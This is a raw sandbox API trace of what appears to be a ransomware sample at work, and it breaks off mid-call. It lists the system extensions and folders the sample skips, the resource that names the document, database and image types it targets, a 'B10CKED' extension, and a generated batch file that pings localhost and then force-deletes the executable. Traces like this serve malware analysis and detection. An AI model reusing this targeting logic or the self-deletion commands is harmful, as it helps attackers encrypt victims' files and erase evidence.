dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0115.602] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0115.602] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0115.602] LockResource (hResData=0x516f58) returned 0x516f58 [0115.602] FreeResource (hResData=0x516f58) returned 0 [0115.602] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.602] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.602] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.602] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.602] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x15050b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.602] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x15050b0, cbMultiByte=38, lpWideCharStr=0x14fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.602] FreeResource (hResData=0x50d64c) returned 0 [0115.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x15050b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1494258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0115.602] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1494258, cbMultiByte=97, lpWideCharStr=0x1462ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0115.603] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0115.603] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0115.603] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x14e0df0, dwCreationFlags=0x4, lpThreadId=0x14fdd84 | out: lpThreadId=0x14fdd84*=0xe18) returned 0xb8 [0115.640] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0115.640] ResumeThread (hThread=0xb8) returned 0x1 [0115.640] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0115.808] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.808] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0115.808] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0115.808] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0115.808] LockResource (hResData=0x5187d4) returned 0x5187d4 [0115.808] FreeResource (hResData=0x5187d4) returned 0 [0115.808] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.808] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.808] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.808] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505120, cbMultiByte=38, lpWideCharStr=0x14fdf6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.808] FreeResource (hResData=0x50d64c) returned 0 [0115.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1505124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.808] GetCurrentThreadId () returned 0xdec [0115.808] GetCurrentThreadId () returned 0xdec [0115.808] GetCurrentThreadId () returned 0xdec [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14fde48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14fde48, cbMultiByte=83, lpWideCharStr=0x149012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0115.808] GetTickCount () returned 0x277cd [0115.808] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=17259758321) returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="s畔﮴\x12\x1c翻") returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Q畔﮴\x12\x1c翻") returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="F畔﮴\x12\x1c翻") returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="g畔﮴\x12\x1c翻") returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="q畔﮴\x12\x1c翻") returned 1 [0115.809] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="t畔﮴\x12\x1c翻") returned 1 [0115.809] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="R畔﮴\x12\x1c翻") returned 1 [0115.809] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="n畔﮴\x12\x1c翻") returned 1 [0115.809] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0115.809] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0115.809] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", lpszShortPath=0x149c65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe") returned 0x30 [0115.809] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0115.809] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0115.809] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0115.809] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0115.809] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0115.809] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x147fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0115.809] WriteFile (in: hFile=0xe8, lpBuffer=0x147fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x147fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0115.810] CloseHandle (hObject=0xe8) returned 1 [0115.811] GetCurrentThreadId () returned 0xdec [0115.811] GetCurrentThreadId () returned 0xdec [0115.811] GetCurrentThreadId () returned 0xdec [0115.811] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, 